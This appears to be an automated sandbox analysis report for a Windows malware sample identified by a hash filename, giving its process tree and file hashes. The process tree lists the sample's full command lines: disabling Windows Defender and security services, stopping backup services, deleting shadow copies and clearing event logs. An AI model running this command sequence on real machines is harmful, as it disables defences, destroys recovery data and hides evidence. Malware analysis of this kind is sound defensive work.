PID 4340 wrote to memory of 4428 4340 net.exe net1.exe PID 4340 wrote to memory of 4428 4340 net.exe net1.exe PID 4340 wrote to memory of 4428 4340 net.exe net1.exe PID 3328 wrote to memory of 4388 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 4388 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 4388 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 4388 wrote to memory of 4276 4388 net.exe net1.exe PID 4388 wrote to memory of 4276 4388 net.exe net1.exe PID 4388 wrote to memory of 4276 4388 net.exe net1.exe PID 3328 wrote to memory of 3200 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 3200 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 3200 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3200 wrote to memory of 3804 3200 net.exe net1.exe PID 3200 wrote to memory of 3804 3200 net.exe net1.exe PID 3200 wrote to memory of 3804 3200 net.exe net1.exe PID 3328 wrote to memory of 316 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 316 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 316 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 316 wrote to memory of 2836 316 net.exe net1.exe PID 316 wrote to memory of 2836 316 net.exe net1.exe PID 316 wrote to memory of 2836 316 net.exe net1.exe PID 3328 wrote to memory of 508 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 508 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3328 wrote to memory of 508 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 508 wrote to memory of 792 508 net.exe net1.exe PID 508 wrote to memory of 792 508 net.exe net1.exe PID 508 wrote to memory of 792 508 net.exe net1.exe PID 3328 wrote to memory of 888 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3328 wrote to memory of 888 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3328 wrote to memory of 888 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3328 wrote to memory of 892 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3328 wrote to memory of 892 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3328 wrote to memory of 892 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3328 wrote to memory of 1224 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3328 wrote to memory of 1224 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3328 wrote to memory of 1224 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe PID 3328 wrote to memory of 1392 3328 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3456
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1632
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:4196
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:788
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4428
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:4276
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3804
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2836
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_13048" /y2⤵
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_13048" /y3⤵PID:792
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:888
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:892
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1224
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1392
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1624
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1748
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2052
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2408
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_13048" start= disabled2⤵PID:2712
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2760
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3728
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3956
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:4084
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4824
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2204
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1304
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2996
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4852
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:4596
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:4872
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:4472
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:5028
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:624
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1276
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:4944
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:4960
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:416
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2104
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1244
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1588
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1796
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1856
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2124
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2596 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:4400 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3304 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4932
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4484
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2304
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3708
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:4988 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3092
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4976 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3456 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:364 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3408 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:816 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:4364
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4292 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2136
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2608
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5
5d8bf6eced4d0a80279646c6a37b9a4f
SHA11481dccc6b3a854d4e47bbac5b47192c4aa1f7e4
SHA256cc60d80176eb96fc3f40b32201c4359942ccf293ba514832f4634dbd42d64c1c
SHA5120a07227bd5705d99e6b48fe5e71dac9abdc5c72e831cebf6493fcb9a88b91422d3814f9ac45fddb60a2c70c26f24428a956cb7cddd25eaa0b5fc8c7c454afbc4